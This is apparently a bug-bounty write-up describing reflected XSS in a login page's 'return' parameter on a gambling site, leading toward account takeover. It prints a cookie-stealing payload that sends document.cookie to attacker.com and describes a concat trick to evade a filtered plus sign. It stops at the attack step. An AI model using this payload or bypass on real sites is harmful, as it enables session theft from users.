XSS to Account Takeover
One of the hottest topics in today’s world is the gambling industry. Most of these websites use the same script. Therefore, if one of them is vulnerable, several million users could be at risk!
1 — Recon
To begin with, I examined several pages on the website for vulnerabilities but did not conclude. Then, I noticed that the login page was displayed to me despite being logged in. There is no impact. It may be the developer’s fault, but what if I discover a vulnerability on this page?
By inspecting the source of the page, I found a parameter called “return”. This parameter specifies the address that the user will be redirected to after logging in.
2 — Vulnerability
using different phrases, I found the forbidden characters. The next step is to prepare the payload to steal cookies from the user.
3 — Payload & Bypass
To send cookies to our server, we must use the following payload. but the problem is that the characters are filtered, so it does not work!
var url = “http://attacker.com/evil.php?cookie=" + document.cookie; document.location = url;
Let’s bypass it:
We cannot add cookies to our URL because the plus sign (+) is filtered.
How to bypass it?
Separate the URL into two parts (attacker server and cookies), then combine them in a new variable using the “concat” function.
4 — Attack